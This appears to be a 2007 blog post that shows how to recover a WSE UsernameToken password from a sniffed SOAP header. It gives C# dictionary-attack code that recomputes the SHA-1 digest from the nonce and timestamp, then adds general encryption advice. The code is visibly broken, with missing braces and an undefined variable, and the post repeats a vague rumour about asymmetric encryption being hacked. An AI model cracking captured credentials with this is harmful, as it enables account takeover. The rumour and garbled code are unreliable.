WSE UsernameToken Password SendHashed – Crack

By admin - Last updated: Monday, November 12, 2007 - Save & Share - Leave a Comment

Using ServiceCapture, Ethereal, Charles or some SOAP sniffer software to inspect the XML sent on wire.
Here is XML snippet in the SOAP header.

<wsse:usernametoken wsu:id="...." xmlns:wsu="....">
    <wsse:password type="....">
static void Main()
    List<string> wordList = new List<string>();
    //Load your word list here from a prepared common dictionary
    //e.g. wordList = LoadWordList();
    //uncomment the line below to add password you know for testing
    string created = "1975-12-01T05:28:36Z"; //sample date
    string nonce = "eSM7S/iT0KyA39vuWPQcPQ==";
    string digest = "fCQCp/A9wFD/Gku0L+yF/u+0leg=";

    foreach(string s in wordList)
        if (IsPasswordMatche(passwordAttempt, nonce, created, digest))
            Console.WriteLine(s + " is the password");
 //Digest = Base64( SHA-1( Nonce + Created + Password ) )
static bool IsPasswordMatche(string secret, string nonce,
             string created, string pwDigest)
    byte[] nonceBytes = Convert.FromBase64String(nonce);
    string myHash = ComputePasswordDigest(nonceBytes, created, secret);
    if (myHash == pwDigest)
        return true;
    return false;

static string ComputePasswordDigest(byte[] nonce, string created,
         string secret)
    if ((nonce == null) || (nonce.Length == 0))
        throw new ArgumentNullException("nonce");
    if (secret == null)
        throw new ArgumentNullException("secret");
    byte[] b1 = Encoding.UTF8.GetBytes(created);
    byte[] b2 = Encoding.UTF8.GetBytes(secret);
    byte[] b3 = new byte[nonce.Length + b1.Length + b2.Length];
    Array.Copy(nonce, b3, nonce.Length);
    Array.Copy(b1, 0, b3, nonce.Length, b1.Length);
    Array.Copy(b2, 0, b3, (int)(nonce.Length + b1.Length), b2.Length);
    return Convert.ToBase64String(SHA1.Create().ComputeHash(b3));

Once you’ve got a good dictionary or dictionary generator, the password would be calculated sooner or later. By signing your SOAP message, it only ensures the message will not be altered during the origin request to the destination, however you can use the similar way to get the password too.

All in all, if you want to have a real secure password, you need to sign/encrypt the sensitive data by a secret( x509 certificate as public, private key encryption). Still there was girl, I heard from some news, from a Chinese University, had found a quickest way to hack the public,private(asymmetric) key encryption. (symmetric key or single private key encryption is weaker than asymmetric)

The reason public,private key encryption is secure is that the private key is extremely hard to calculate, nearly impossible to derive it from its public key which can be known by everyone. The trade-off of using asymmetric key encryption is the processing algorithm which is thousands times slower than single private key encryption. The single private key mechanism can make your message relatively secure, but it is hard to maintain. e.g. each party needs to have the same private key and the live period of the private key should not be too long which involving all the parties to synchronise the key. This starts a management issue.

The final question is
Is your message so important to let other know or does your client side have the resources or plan to implement and maintain this? If the answer is yes, definitely do it.

Posted in Security • Tags: , , , , , , , Top Of Page